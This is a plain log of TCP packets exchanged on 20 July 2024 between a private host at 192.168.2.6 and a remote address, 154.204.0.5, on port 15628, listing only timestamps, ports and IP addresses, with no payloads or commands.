Jul 20, 2024 16:31:19.796009064 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.796066046 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.801637888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.801702023 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.807785034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.807842016 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.812858105 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.812920094 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.818811893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.818872929 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.823939085 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.823997974 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.829154968 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.829233885 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.834295988 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.834345102 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.840713024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.840771914 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.845875978 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.845932007 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.852740049 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.852796078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.860229969 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.860286951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.865312099 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.865372896 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.870351076 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.870408058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.876837015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.876890898 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.881922007 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.881987095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.888200998 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.888257027 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.893685102 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.893740892 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.899653912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.899713993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.904970884 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.905030966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.911535978 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.911607981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.918867111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.918927908 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.923935890 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.923990965 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.928992033 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.929044962 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.933957100 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.934073925 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.939132929 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.939193010 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.944591999 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.944653988 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.950520992 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.950581074 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.955822945 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.956754923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.961963892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.962018013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.968586922 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.968648911 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.979803085 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.979857922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.985625029 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.985687017 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:19.991193056 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:19.991254091 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.000324011 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.000386953 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.020425081 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.020510912 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.036144972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.036237001 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.041790962 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.041857958 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.046912909 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.046969891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.052452087 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.052517891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.057760954 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.057822943 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.063513041 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.063579082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.068597078 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.068650961 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.074223995 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.074275970 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.079839945 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.079891920 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.086999893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.087052107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.091905117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.091949940 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.097095013 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.097137928 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.102535963 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.102593899 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.107687950 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.107739925 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.142710924 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.142765999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.148916006 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.148976088 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.155117035 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.155165911 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.160037041 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.160079956 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.165432930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.165482998 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.171597004 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.171649933 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.177376032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.177436113 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.182509899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.182553053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.187643051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.187694073 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.193049908 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.193114996 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.260776997 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.297615051 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.345948935 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.379626036 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.410916090 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.414460897 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.450830936 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.450939894 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.451121092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.456983089 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.457273006 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.457318068 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.457551956 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.457571983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.457772017 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.457812071 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.458084106 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.458268881 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.458550930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.458590984 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.458878994 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.458920956 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.458959103 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.458997011 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.459034920 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.459173918 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.459736109 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.463347912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.463411093 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.463810921 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.465382099 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.465527058 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.468008041 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.468998909 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.469120979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.496202946 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.500039101 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.505127907 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.508001089 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.512926102 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.513190985 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.520812035 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.524020910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.529196024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.531891108 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.540189981 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.543648005 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.548652887 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.551655054 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.559278965 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.559469938 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.566160917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.566446066 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.572079897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.572240114 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.577827930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.579998016 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.584939957 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.587800980 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.592782974 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.596019983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.602325916 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.603955984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.610308886 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.611845016 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.617010117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.620249987 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.625664949 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.625870943 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.631119013 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.632122993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.637335062 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.639869928 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.644735098 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.651233912 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.656168938 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.660074949 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.665473938 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.668097973 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.677279949 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.680038929 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.685105085 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.687858105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.693073034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.696003914 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.702559948 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.703910112 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.709487915 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.712508917 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.718628883 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.722939968 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.728168011 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.732506037 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.753179073 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.755808115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.762362003 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.762712002 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.767821074 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.768083096 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.773230076 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.773462057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.778579950 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.778716087 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.783654928 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.784113884 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.789227009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.789347887 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.797238111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.797388077 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.802464008 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.802716017 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.807718992 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.808095932 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.815236092 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.815596104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.820477962 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.820684910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.825905085 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.826041937 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.831850052 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.832041025 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.837162971 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.839898109 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.844768047 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:20.845021009 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.872520924 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.900523901 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.924843073 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.953463078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:20.985717058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.018989086 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.045468092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.067549944 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.094624996 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.120704889 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.145467043 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.169482946 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.190437078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.217480898 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.236840963 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.261460066 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.264624119 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.264682055 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.264697075 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.265182972 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.265866041 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.266254902 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.267244101 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.267256975 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.267268896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.267313957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.267885923 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.268186092 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.268198013 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.268208981 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.268347979 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.268390894 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.268513918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.268564939 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.268585920 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.268621922 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.268706083 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.268731117 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.268845081 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.269171953 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.269433022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.271873951 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.272301912 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.272519112 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.272701979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.273531914 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.274115086 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.274243116 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.274642944 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.275151968 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.278590918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.278806925 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.278996944 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.279617071 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.279772997 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.280945063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.281445980 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.284298897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.285475016 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.286159992 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.288609982 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.289494038 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.290112019 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.292563915 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.294567108 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.294753075 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.295475960 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.297894955 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.300057888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.300285101 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.308758020 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.309573889 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.320092916 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.320719004 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.327903032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.330322027 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.335577011 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.335681915 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.361463070 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:21.366388083 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:21.366784096 CEST	15628	49722	154.204.0.5	192.168.2.6
